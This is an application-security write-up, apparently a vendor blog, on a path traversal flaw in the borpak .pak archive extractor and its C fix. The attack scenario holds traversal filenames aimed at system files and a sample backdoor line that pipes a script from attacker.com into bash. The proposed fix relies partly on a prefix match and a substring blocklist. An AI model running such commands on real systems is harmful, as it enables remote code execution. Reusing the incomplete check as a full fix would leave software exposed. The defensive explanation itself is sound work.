What is path traversal?

Path traversal is a vulnerability where attackers manipulate file paths using sequences like `../` to access or write files outside intended directories, potentially compromising system files.

How do you prevent path traversal in C?

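Validate paths by resolving them with `realpath()`, rejecting traversal sequences (`../`, `..\\`, URL-encoded variants), and verifying that the resolved path is the intended root directory or lies beneath it. Because `realpath()` fails for paths that do not exist yet, resolve the parent directory when validating a file that is about to be created.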

What CWE is path traversal?

CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) covers path traversal vulnerabilities.

Is checking for `../` enough to prevent path traversal?

No, attackers use variations like `..\\`, `....//`, URL-encoded `%2e%2e%2f`, and Unicode representations. You must normalize paths and verify containment after resolution.

Can static analysis detect path traversal?

Yes, static analysis tools can detect path traversal by tracking tainted input from archive filenames to file operations and flagging missing sanitization.

How path traversal happens in C file extraction and how to fix it

Introduction

The borpak tool handles extraction of .pak archive files, reading filenames from the archive and creating output files accordingly. However, a critical flaw at line 302 of tools/borpak/source/borpak.c allowed attackers to escape the intended extraction directory entirely. When extracting files, the code used memcpy to copy filenames directly from the archive without any sanitization, so a malicious archive containing ../../../etc/cron.d/malicious as a filename would make borpak write to that path, resolved relative to the extraction directory.

This vulnerability is particularly dangerous because archive extraction is often performed with elevated privileges or in automated pipelines. A developer downloading and extracting a seemingly innocent game mod or resource pack could unknowingly compromise their entire system.

The Vulnerability Explained

When borpak extracts files from a .pak archive, it reads the filename stored in the archive header and uses it to construct the output path. The original code performed something like:

// Vulnerable pattern in borpak.c:302
char output_path[4096];
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
// pak_entry->filename comes directly from the archive with no validation
FILE *out = fopen(output_path, "wb");

The problem? The pak_entry->filename is attacker-controlled data read directly from the archive. An attacker crafting a malicious .pak file could include entries like:

../../../etc/passwd - Overwrite the system account file
../../home/user/.bashrc - Inject malicious shell commands
../../../etc/cron.d/backdoor - Install persistent backdoor
....//....//etc/shadow - Dot-and-slash variation that collapses to ../../etc/shadow when a naive filter strips ../ only once
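To see why the ....// variation matters, here is a minimal sketch of a naive filter. The function name strip_dotdot_once is hypothetical and is not part of borpak; it only illustrates a single-pass filter that deletes every ../ it finds without re-checking its own output.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical naive filter (illustration only, not borpak code):
 * removes each "../" in one left-to-right pass and never re-checks
 * the string it produces. */
static void strip_dotdot_once(const char *in, char *out, size_t out_size)
{
    size_t i = 0, j = 0;

    if (out_size == 0)
        return;

    while (in[i] != '\0' && j + 1 < out_size) {
        if (strncmp(&in[i], "../", 3) == 0) {
            i += 3;              /* drop the traversal sequence */
        } else {
            out[j++] = in[i++];  /* copy everything else unchanged */
        }
    }
    out[j] = '\0';
}
```

Passing "....//....//etc/shadow" through this filter yields "../../etc/shadow": removing the inner ../ from each ....// leaves a fresh ../ behind. This is why stripping patterns is weaker than rejecting the entry or checking containment after resolution.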

Real Attack Scenario

Imagine a game modding community where users share .pak files containing textures and models. An attacker creates a mod called "HD_Textures.pak" with these entries:

textures/grass.png          (legitimate file)
textures/stone.png          (legitimate file)
../../../home/user/.bashrc  (malicious payload)

When a user runs borpak -x HD_Textures.pak -d ./mods/, the tool extracts the textures normally but also writes to .bashrc, injecting:

curl http://attacker.com/shell.sh | bash &

The next time the user opens a terminal, the backdoor executes.

The Fix

The fix implements a path_stays_within_root() validation function that ensures no extracted file can escape the intended directory. Here's the security logic added:

static int path_stays_within_root(const char *root, const char *filename)
{
    char combined[4096];

    snprintf(combined, sizeof(combined), "%s/%s", root, filename);

    /* Normalize: check if the combined path, when resolved, starts with root */
    char *rp = realpath(root, NULL);
    if (!rp) return 0;

    /* Let realpath() resolve ../ components and symlinks; this only succeeds if the path already exists */
    char *res = realpath(combined, NULL);
    if (res) {
        int contained = (strncmp(res, rp, strlen(rp)) == 0);
        free(res);
        free(rp);
        return contained;
    }

    /* If file doesn't exist, do string-based check for traversal */
    int has_traversal = (strstr(filename, "../") != NULL ||
                         strstr(filename, "..\\") != NULL ||
                         strstr(filename, "%2e%2e") != NULL ||
                         strstr(filename, "....//") != NULL);
    free(rp);
    return !has_traversal;
}

Key Security Improvements

Path Resolution: Uses realpath() to resolve the combined path, eliminating symbolic links and ../ sequences whenever the target already exists
Containment Check: Verifies that the resolved path starts with the resolved extraction root directory
Pattern Detection: Falls back to string-based detection of traversal patterns when realpath() fails, which is the usual case for files that have not been created yet
Multiple Encoding Coverage: Catches ../, ..\\ (Windows), lowercase URL-encoded %2e%2e, and double-dot variations like ....//
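One detail worth checking in any prefix-based containment test: a plain strncmp() prefix match also accepts sibling directories whose names merely begin with the root, such as /tmp/mods-evil for a root of /tmp/mods. The sketch below shows one way to require a component boundary. The helper name is_within_root is an assumption for illustration and is not taken from the borpak fix; it expects both arguments to be canonical absolute paths already.

```c
#include <string.h>

/* Hypothetical helper (not from borpak): returns 1 if `path` is `root`
 * itself or lies beneath it, 0 otherwise. Both arguments are assumed to
 * be canonical absolute paths, e.g. results of realpath(). */
static int is_within_root(const char *root, const char *path)
{
    size_t root_len = strlen(root);

    /* Ignore a trailing slash on root, but keep "/" itself intact. */
    while (root_len > 1 && root[root_len - 1] == '/')
        root_len--;

    if (strncmp(path, root, root_len) != 0)
        return 0;

    /* A root of "/" contains every absolute path. */
    if (root_len == 1 && root[0] == '/')
        return 1;

    /* The match must end exactly on a component boundary. */
    return path[root_len] == '/' || path[root_len] == '\0';
}
```

With this check, /tmp/mods/textures/a.png is accepted for root /tmp/mods, while /tmp/mods-evil/x is rejected even though it shares the same string prefix.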

Before vs After

Before (Vulnerable):

// pak_entry->filename used directly - DANGEROUS
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
FILE *out = fopen(output_path, "wb");

After (Secure):

// Validate path stays within extraction directory
if (!path_stays_within_root(extract_dir, pak_entry->filename)) {
    fprintf(stderr, "Error: Path traversal detected in '%s'\n", pak_entry->filename);
    continue; // Skip malicious entry
}
snprintf(output_path, sizeof(output_path), "%s/%s", extract_dir, pak_entry->filename);
FILE *out = fopen(output_path, "wb");

Prevention & Best Practices

1. Never Trust Archive Contents

Archive filenames, sizes, and metadata are all attacker-controlled. Treat them as untrusted input:

// Always validate before use
if (contains_path_traversal(filename) || strlen(filename) > MAX_FILENAME) {
    reject_entry();
}
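The contains_path_traversal() call above is a placeholder. One possible shape for it, offered as a sketch rather than as the borpak implementation, is to split the name into components and reject any component that is exactly "..", along with absolute paths. Treating both / and \ as separators is an assumption made here so that Windows-style entries are covered too; drive-letter prefixes such as C: are not handled.

```c
#include <string.h>

/* Hypothetical implementation (illustration only): returns 1 if `name`
 * is absolute or has any component that is exactly "..", 0 otherwise.
 * Both '/' and '\\' are treated as separators. */
static int contains_path_traversal(const char *name)
{
    const char *p = name;

    if (name[0] == '/' || name[0] == '\\')
        return 1;                        /* absolute path */

    while (*p != '\0') {
        size_t len = strcspn(p, "/\\");  /* length of this component */

        if (len == 2 && p[0] == '.' && p[1] == '.')
            return 1;                    /* ".." component */

        p += len;
        if (*p != '\0')
            p++;                         /* skip the separator */
    }
    return 0;
}
```

Checking whole components instead of substrings avoids false positives on legitimate names such as my..file.txt while still catching a/../../b and ..\..\x.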

2. Use Canonical Path Comparison

Always resolve paths to their canonical form before comparison:

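char *canonical_root = realpath(extract_dir, NULL);
char *canonical_file = realpath(full_path, NULL);  // NULL if full_path does not exist
size_t n = canonical_root ? strlen(canonical_root) : 0;
if (!canonical_root || !canonical_file ||
    strncmp(canonical_file, canonical_root, n) != 0 ||
    (n > 1 && canonical_file[n] != '/' && canonical_file[n] != '\0')) {
    // Path escapes root or could not be resolved - reject
}
free(canonical_root);
free(canonical_file);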

3. Consider Allowlisting

For known archive formats, validate filenames against expected patterns:

// Only allow alphanumeric, dots, slashes (no backslashes or special chars)
if (!is_valid_filename_pattern(filename)) {
    reject_entry();
}
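The is_valid_filename_pattern() call above is likewise a placeholder. A minimal sketch of such an allowlist might look like the following. The exact character set (letters, digits, dot, underscore, hyphen, slash), the 255-byte limit, and the rule that no component may start with a dot are assumptions chosen for illustration; a real tool would tune them to what its archive format legitimately contains.

```c
#include <ctype.h>
#include <string.h>

/* Hypothetical allowlist check (illustration only): accepts relative names
 * built from [A-Za-z0-9._-] components separated by single '/' characters.
 * Components may not start with '.', which rules out ".", "..", and
 * hidden files such as ".bashrc". */
static int is_valid_filename_pattern(const char *name)
{
    size_t len = strlen(name);
    char prev = '/';   /* treat the start as "just after a separator" */
    size_t i;

    if (len == 0 || len > 255 || name[0] == '/')
        return 0;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];

        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '/'))
            return 0;                  /* character outside the allowlist */
        if (c == '.' && prev == '/')
            return 0;                  /* component starts with a dot */
        if (c == '/' && prev == '/')
            return 0;                  /* empty component */
        prev = (char)c;
    }
    return name[len - 1] != '/';       /* must not end with a separator */
}
```

Because the allowlist names what is permitted instead of what is forbidden, backslashes, percent signs, and control characters are rejected without having to enumerate each encoding trick.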

4. Use Secure Extraction Libraries

Modern libraries like libarchive include built-in protection against path traversal when configured correctly:

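// Reject ".." components, symlink traversal, and absolute paths during extraction
archive_read_extract(a, entry, ARCHIVE_EXTRACT_SECURE_NODOTDOT |
    ARCHIVE_EXTRACT_SECURE_SYMLINKS | ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS);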

Key Takeaways

Archive filenames are attacker-controlled: The pak_entry->filename in borpak came directly from the archive without any validation
realpath() is essential for path validation: String-based checks alone miss edge cases; always resolve to canonical paths
Check multiple traversal encodings: Attackers use ../, ..\\, %2e%2e, ....//, and Unicode variants
Extraction tools need defense-in-depth: Even if one check fails, containment verification catches the escape
Regression tests with attack payloads are critical: The new test suite covers ../../../etc/passwd, ....// variations, and URL-encoded attacks

How Orbis AppSec Detected This

Source: Filename data read from .pak archive entries via memcpy in borpak.c
Sink: fopen() and file write operations at tools/borpak/source/borpak.c:302 using unsanitized paths
Missing control: No validation that constructed file paths stayed within the extraction directory
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Fix: Added path_stays_within_root() function that validates paths using realpath() resolution and pattern detection for traversal sequences

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.

Conclusion

Path traversal in archive extraction is a classic vulnerability that continues to affect modern codebases. The borpak fix demonstrates the proper approach: resolve paths to their canonical form, verify containment within the intended directory, and catch multiple encoding variations of traversal sequences. When handling any archive format—whether .pak, .zip, .tar, or others—always treat filenames as untrusted input and validate before writing.

cwe	CWE-22
fix	Validate extracted paths stay within the declared extraction root directory
risk	Arbitrary file write leading to system compromise
language	C
root cause	Filenames from .pak archives used directly without path sanitization
vulnerability	Path Traversal (Directory Traversal)
